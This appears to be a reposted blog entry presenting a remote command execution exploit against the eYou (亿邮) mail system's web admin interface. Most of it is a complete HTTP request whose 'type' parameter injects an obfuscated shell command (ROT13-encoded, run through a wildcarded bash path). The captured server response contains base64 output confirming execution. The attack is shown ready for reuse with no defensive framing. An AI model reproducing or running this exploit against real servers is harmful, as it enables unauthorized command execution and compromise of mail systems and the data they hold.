• 亿邮RCE


    REQUEST:
    POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.0
    Host: 
    Connection: close
    Content-Length: 85
    Cache-Control: max-age=0
    Sec-Ch-Ua: "Google Chrome";v="89", "Chromium";v="89", ";Not A Brand";v="99"
    Sec-Ch-Ua-Mobile: ?0
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
    Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Content-Type: application/x-www-form-urlencoded
    
    
    type='|echo "png /cebp/irefvba" |tr 'N-ZA-Mn-za-m' 'A-Za-z' | /bin/ba?h | base64||'
    

      

    RESPONSE:
    HTTP/1.1 200 OK
    Server: nginx/1.18.0
    Date: Thu, 08 Apr 2021 15:25:37 GMT
    Content-Type: image/gif
    Connection: close
    P3P: CP=CAO PSA OUR
    Set-Cookie: EMPHPSID=0hb64kr702b1khlgh94tv4ah77; path=/; HttpOnly
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Last-Modified: Thu, 08 Apr 2021 15:25:37 GMT
    Cache-Control: no-cache, must-revalidate
    Pragma: no-cache
    
    
    <html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><script type="text/javascript">
    !--
    var _location = window.location;
    var _pathname = _location.pathname;
    var _qs = _location.search;
    
    if (-1 === _pathname.indexOf("plugin")) { / system
    var qs = _location.search.substr(1).replace(/furl=[0-9a-zA-Z]*/g, "");
    var url = "?q=logout.do&furl=" encodeURIComponent(qs);
    alert("您没有登录,或者登录已经过期,请重新登录。Code: 01");
    top.location = url;
    } else { / plugin
    alert("您没有登录,或者登录已经过期,请重新登录。Code: 02");
    var url = "?q=logout.do&furl=" encodeURIComponent(_pathname _qs);
    top.location = _location.protocol "/" _location.host "/webadm/" url;
    }
    /--!
    </script></head><body></body></html>TGludXggdmVyc2lvbiAzLjEwLjAtOTU3LjEyLjIuYXhzNy54ODZfNjQgKHJvb3RAaG9zdDU0KSAo
    Z2NjIHZlcnNpb24gNC44LjUgMjAxNTA2MjMgKFJlZCBIYXQgNC44LjUtMzYpIChHQ0MpICkgIzEg
    U01QIE1vbiBKdW4gMyAwOTozMzozMCBDU1QgMjAxOQo=
    

      

  • 相关阅读:
    问:Linux下Chrome标题栏中文乱码
    通过printf设置Linux终端输出的颜色和显示方式
    连HTTPS都有漏洞,这么不安全的互联网我们还要继续用吗?
    为什么TCP连接不可靠
    TCP发送接口的返回值
    /proc/uptime详解
    Linux Kernel Version Numbering
    Understanding Linux /proc/cpuinfo
    Android Tips: Best Practices for Using Alpha
    如何让LinearLayout也有类似Button的点击效果?
  • 原文地址:https://www.cnblogs.com/0day-li/p/14637579.html
Copyright © 2020-2023  润新知